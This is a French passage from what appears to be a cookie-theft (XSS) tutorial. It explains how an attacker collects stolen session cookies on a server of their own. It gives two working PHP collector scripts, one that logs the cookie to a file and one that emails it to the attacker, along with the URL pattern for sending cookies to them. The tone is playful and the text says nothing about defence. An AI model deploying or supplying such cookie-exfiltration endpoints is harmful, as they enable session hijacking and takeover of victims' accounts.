La récupération du cookie par l'attaquant peut se faire par plusieurs façons.
Les premiers scripts envoyaient directement le cookie par e-mail, en se servant du formulaire
d'envoi de e-mails du compte attaqué. La technique pose problème si la personne enregistre les
e-mails envoyés. Le e-mail est alors visible et la personne se rend compte de la coquetterie ;-p
Le plus efficace est d'envoyer le cookie vers un site, configuré avec soins par l'attaquant.
Exemples basiques de scripts PHP :
Enregistrement dans un fichier :
Fichier : recup.php
<?
$data = "$cookie\n"; // On forme les données à ajouter
$fp = fopen("log.txt", "a+"); // Ouverture du fichier en mode écriture (ajout)
fputs($fp, $data); // Ajout des données
fclose($fp); // Fermeture du fichier
?>
Note : Le fichier log.txt doit exister.
Fonctionnement : http://votresite/recup.php?cookie= le cookie
|
Envoi par e-mail :
Fichier : recup.php
<?
$data = "$cookie\n"; // On forme les données à envoyer
$from = "cookie@caramail.com"; // E-mail expéditeur
$to = "votre login@caramail.com"; // Adresse recevant le cookie
$sujet = "Cookie reçu :-)";
$entete = "Date: ".date("D, j M Y H:i:s -0600"); // Date du mail
$entete .= "From: $from \n"; // Expéditeur
mail($to, $sujet, $data, $entete);
?>
Note : Fonction désactivée chez certains hébergeurs.
Fonctionnement : http://votresite/recup.php?cookie= le cookie
|
Notez que PHP propose plein de fonctionnalités et que des options très poussées peuvent être mises en place :-)
|
|
